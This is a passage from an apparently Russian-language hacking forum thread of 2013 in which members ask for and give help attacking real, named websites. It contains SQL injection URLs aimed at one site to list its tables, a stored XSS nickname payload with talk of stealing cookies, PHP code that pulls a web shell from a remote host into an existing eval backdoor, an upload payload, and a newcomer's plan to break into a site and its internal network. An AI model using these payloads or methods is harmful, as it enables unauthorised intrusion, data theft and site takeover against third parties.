Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HackCrack

    HackCrack New Member

    Joined:
    19 May 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Спасибо.
    Теперь проблема в том, чтобы получить названия таблиц.
    Code:
    http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
    Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..

    Как получить нужные таблицы?

    PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.
     
    #22021 HackCrack, 25 Mar 2013
    Last edited: 25 Mar 2013
  2. AIRZI

    AIRZI Banned

    Joined:
    11 Mar 2009
    Messages:
    6
    Likes Received:
    2
    Reputations:
    4
    Кто-нибудь может проконсультировать по XSS?
    Суть такая, короче зарегистровался на сайте под ником '><script>alert()</script>
    и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
     
  3. HackCrack

    HackCrack New Member

    Joined:
    19 May 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
     
  4. AIRZI

    AIRZI Banned

    Joined:
    11 Mar 2009
    Messages:
    6
    Likes Received:
    2
    Reputations:
    4
    Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы?
    Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    листать дальшше

    http://forum.antichat.ru/thread20140.html
     
    #22025 qaz, 25 Mar 2013
    Last edited: 25 Mar 2013
  6. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    108
    Likes Received:
    31
    Reputations:
    27
    Code:
    http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+[B]where+table_schema=database()[/B]+limit+4,1+--+
     
    1 person likes this.
  7. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    На сайте есть минишелл eval(stripslashes($_GET[e]));
    allow_url_fopen On
    allow_url_include Off
    disable_functions exec,passthru,shell_exec,proc_open,popen

    Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
     
  8. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться.
    Code:
    $content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h);
    UPD
    А еще проще залей текст шелла без <?php и ?> на хост
    ,а потом
    ?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
     
  9. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4

    Такое не прокатывает какраз(((

    Вот таким методом выводится через минишелл.
    file.php?e=phpinfo();
    Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить.

    Ранее нормально закачивал таким методом, но щас папка закрыта для правки:
    file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>/form%3E
     
  10. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    Ну Дак ты пиши чё не прокатывает????
     
  11. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему:
    Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее:
    1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута)
    2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети
    3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями.
    4. В расшаренных папках виртуальной сети ничего интересного не нашел.
    5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти.
    А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться.
    Для себя выстроил следующий алгоритм:
    1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты)
    2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует)
    3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет)
    4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю)
    5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы)
    6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика)
    Прошу помощи с литературой, методой и софтом, особенно по первым пунктам.
    Спасибо
     
  12. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    собств. вопрос можно ли зная хеш и соль (sql инъекция) залогиниться в админку Vbulletin 4.0.2. хотелось бы узнать технику реализации.
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    848
    Reputations:
    857
    Нет, нельзя. Для этого хэшики и солят, чтобы усложнить подбор пароля.

    Эх, было бы всё так легко ... :rolleyes:
     
    _________________________
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    848
    Reputations:
    857
    Файл сессии руками на сервере создавать будешь ? Session_ID от балды придумывать ?
     
    _________________________
  16. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Научи, как в Joomla залогониться при помощи хэша
     
    #22036 er9j6@, 29 Mar 2013
    Last edited: 29 Mar 2013
  17. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    если и есть такой способ, то это единичный случай с конкретной багой по конкретной версии, а так это фейк!
     
  18. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    332
    Likes Received:
    177
    Reputations:
    76
    Мембер pinch просто, судя по всему, говоря про WP и Joomla, путает понятия обхода авторизации со сбросом пароля, и последующей авторизацией со своим, уже вновь заданным паролем. Если это так, то где-то тут на Ачате подобная статейка касательно WP точно проскакивала.

    А, вот, нашел, что я имел ввиду http://forum.antichat.ru/thread359532.html

    В данной статье раскрывается метод сброса пароля для движка WP, при наличии доступа к БД сайта. И про Joomla там тоже упоминания есть, только в ее случае не все так просто.

    Надо будет, кстати, поставить плюсик автору статьи за труды. Интересная находка :3
     
    #22038 Га-Ноцри, 31 Mar 2013
    Last edited: 31 Mar 2013
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    сорь за оффтоп, ток вот не зря там люди жаловались на то что он спалил зту тему, так как и не прошло и 2 недели после его поста как было сделано обновление ворд пресса в котором лавочка прикрылась.
     
  20. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://rostovshoes.ru/shoes/?6,1,,,all'
    Что скажете?
     
Loading...
Thread Status:
Not open for further replies.